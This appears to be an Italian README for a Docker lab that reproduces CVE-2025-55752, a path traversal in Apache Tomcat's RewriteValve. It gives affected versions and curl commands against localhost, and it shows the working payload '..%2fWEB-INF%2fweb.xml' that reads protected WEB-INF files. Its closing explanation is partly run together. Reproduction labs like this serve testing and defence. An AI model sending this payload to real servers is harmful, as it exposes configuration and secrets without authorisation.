
# Ambiente di riproduzione basato su Docker per CVE-2025-55752, una vulnerabilità di path traversal in Apache Tomcat's RewriteValve, che dimostra il difetto di normalizzazione prima della decodifica e fornisce comandi di test.
Ambiente di riproduzione basato su Docker per CVE-2025-55752, una vulnerabilità di path traversal in Apache Tomcat 10.1.44.
CVE-2025-55752 è una vulnerabilità di path traversal in RewriteValve di Apache Tomcat causata da un'elaborazione errata
dell'ordine: la normalizzazione dell'URL avviene prima della decodifica dell'URL. Ciò consente agli attaccanti di bypassare le restrizioni di sicurezza
che proteggono directory come /WEB-INF/ utilizzando sequenze di path traversal codificate nell'URL (..%2f).
| Serie | Versioni Vulnerabili | Versione Corretta |
|---|---|---|
| 11.x | 11.0.0-M1 a 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 a 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 a 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 a 8.5.100 | EOL - Nessuna patch |
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
curl -I 'http://localhost:8080/WEB-INF/web.xml'
Previsto: 403 Forbidden
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
Previsto: 200 OK + contenuto di web.xml (vulnerabilità confermata)
/download?path=..%2fWEB-INF%2fweb.xml/files/..%2fWEB-INF%2fweb.xml%2f non riconosciuto come /, .. sopravvive%2f → / → /files/../WEB-INF/web.xml/WEB-INF/web.xmlCorretto: Decodifica → Normalizzazione → Controllo di Sicurezza
Vulnerabile: Normalizzazione → Decodifica → Controllo di Sicurezza ✗
../ e %2e%2e⚠️ AVVERTENZA: NON distribuire in produzione. Utilizzare solo in ambienti di test isolati.